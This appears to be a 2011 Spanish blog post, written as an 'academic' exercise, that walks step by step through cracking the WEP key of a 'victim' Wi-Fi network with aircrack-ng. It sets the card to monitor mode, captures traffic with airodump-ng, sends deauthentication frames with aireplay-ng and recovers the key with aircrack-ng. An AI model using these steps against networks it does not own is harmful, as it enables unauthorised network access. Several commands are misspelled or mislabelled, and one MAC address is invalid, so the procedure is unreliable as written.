viernes, 27 de mayo de 2011

Rompiendo redes wi-fi con seguridad wep con aircrack


Aircrack-ng 


Es una suite de seguridad inalámbrica que consiste en un packet sniffer de red, un crackeador de redes WEP y WPA/WPA2-PSK y otro conjunto de herramientas de auditoría inalámbrica.
Entre las herramientas que se incluyen en la suite Aircrack-ng se encuentran las siguientes :
  • airbase-ng
  • aircrack-ng
  • airdecap-ng
  • airdecloak-ng
  • airdriver-ng
  • aireplay-ng
  • airmon-ng
  • airodump-ng
  • airolib-ng
  • airserv-ng
  • airtun-ng
  • easside-ng
  • packetforge-ng
  • tkiptun-ng
  • wesside-ng
  • airdecloak-ng


Las herramientas más utilizadas para la Auditoría inalambrica son:
Aircrack-ng (Descifra la Clave de los vectores de inicio)
Airodump-ng (Escanea las redes y captura vectores de inicio)
Aireplay-ng (Inyecta tráfico para elevar la captura de vectores de Inicio)
Airmon-ng (Logra poner la tarjeta inalámbrica en modo Monitor, para poder capturar e inyectar vectores)
La suite está diseñada para trabajar con una distribución Linux, aunque también existe una versión para Windows que no es muy estable debido a conflictos con drivers.
Esta suite está diseñada para trabajar con tarjetas inalámbricas cuyo chip es Atheros y con algunas de chip Railink sin necesidad de configurarlas. Aunque se ha logrado usar la suite en otros chips, con configuraciones especiales en Linux.
Para hacer esta practica podemos utilizar todas las ditribuciones linux como son:
Back track , que tiene aircrag por defecto, como son 
ubuntu, debian, centos, en estos si es necesario instalar el paquete del aircrack

Esta informacion pertenece a 

http://es.wikipedia.org/wiki/Aircrack-ng


1) Ponemos nuestra tarjeta inalambrica wi-fi en modo monitor, esto sirve para capturar el trafico de la red wi-fi con la que haremos el ataque, miramos nuestra interfaz que este en modo managed (mon0) copiamos la mac por que mas tarde la necesitamos para pegarla.

2) Colocamos nuestra tarjeta en modo monitor

(airmong-ng start wlan0)

3) Procedemos apagar nuestra interfaz de escucha

Iwconfig wlan0 down
Iwconfig wlan0 mode monitor

4) Subimos la interfaz de nuevo

Ifconfig wlan0 up

5) Vemos que nos haya cargado el modo monitor (mono), pasamos de modo managed a modo monitor (mon0)

Iwconfig wlan0 

6)  Procedemos a buscar la victima y la interfaz en la que estamos en nuestro caso la wlan0

 airodump-nf wlan0

7) Nos apareceran las redes disponibles

8) Procedemos a capturar el trafico de nuestra victima lo que haremos sera correr el airodump-ng -bssid (Mac de nuestra victima) -c (canal en que se encuentran la victima) -w (Nombramos el archivo donde estara guardado todos los datos) Wlan0 (la interfaz)

airodump-ng --bssid 08:00:27:g6:7f:8i -c1 daniel wlan0

9) Esperamos a que capture los suficientes paquetes


10) Abrimos otra terminal para el ataque de aireplay para decifrar la wi-fi de la victima

aireplay-ng -0 30 -a (Mac de la victima) -h (Nuestra propia mac) wlan0



11) Cuando tengamos los suficientes paquetes lo recomendable son unos 200000 corremos el aircrack-ng para cifrar la contraseña


aircrack-ng (Nombre donde se guardan los datos, en mi caso daniel.cap) aircrack-ng daniel.cap


12) Ya podemos obsevar la clave, al veces aparece cifrada o en texto plano, pero igual si la ponemos cifrada la reconoce


Esta actividad tiene fines academicos

Ojala les sea de gran ayuda 

Alguna Duda me hacen llegar
danielpalacio92@misena.edu.co


Hasta entonces...

No hay comentarios:

Publicar un comentario en la entrada